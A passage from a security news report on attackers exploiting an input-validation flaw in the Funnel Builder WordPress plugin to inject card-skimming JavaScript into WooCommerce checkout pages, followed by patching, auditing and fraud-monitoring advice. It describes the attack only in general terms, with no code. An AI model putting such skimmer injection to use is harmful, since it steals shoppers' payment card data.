Funnel Builder WordPress plugin bug exploited to steal credit cards

Attackers actively exploit a critical vulnerability in the Funnel Builder WordPress plugin to inject malicious JavaScript into WooCommerce checkout pages, enabling credit card theft from customers.

The vulnerability allows threat actors to inject code directly into the checkout process without authentication. Once injected, the malicious JavaScript captures payment card data as customers enter information during transaction completion. This positions the attack at the moment of maximum sensitivity, when users voluntarily provide full credit card numbers, expiration dates, and CVV codes.

Funnel Builder, a popular WordPress plugin used to create sales funnels and optimize checkout flows, failed to properly sanitize and validate user inputs. The lack of input validation created an opening for unauthenticated attackers to insert arbitrary JavaScript payloads. WooCommerce, the leading e-commerce platform for WordPress, becomes the delivery mechanism for this data-stealing code.

The active exploitation indicates attackers have already weaponized this vulnerability. Every compromised checkout page represents a direct threat to customer payment data. Websites running vulnerable versions expose each transaction to potential interception. The stolen card data has immediate resale value on underground markets, creating financial incentive for continued attacks.

Website owners running Funnel Builder should immediately update to the patched version. The plugin developers released a security update addressing the input validation flaw. Administrators should also audit their WooCommerce checkout pages for signs of injected JavaScript code, which often appears in page source code as unexpected script tags or base64-encoded payloads.

Customers of affected stores face fraud risk if their card details were captured during the exploitation window. Individuals should monitor bank and credit card statements for unauthorized charges and consider disputing transactions made during the vulnerability window. Payment card networks typically provide fraud protection, but proactive monitoring accelerates dispute resolution.

This incident underscores the security risk posed by third-party WordPress plugins. Plugin vulnerabilities represent a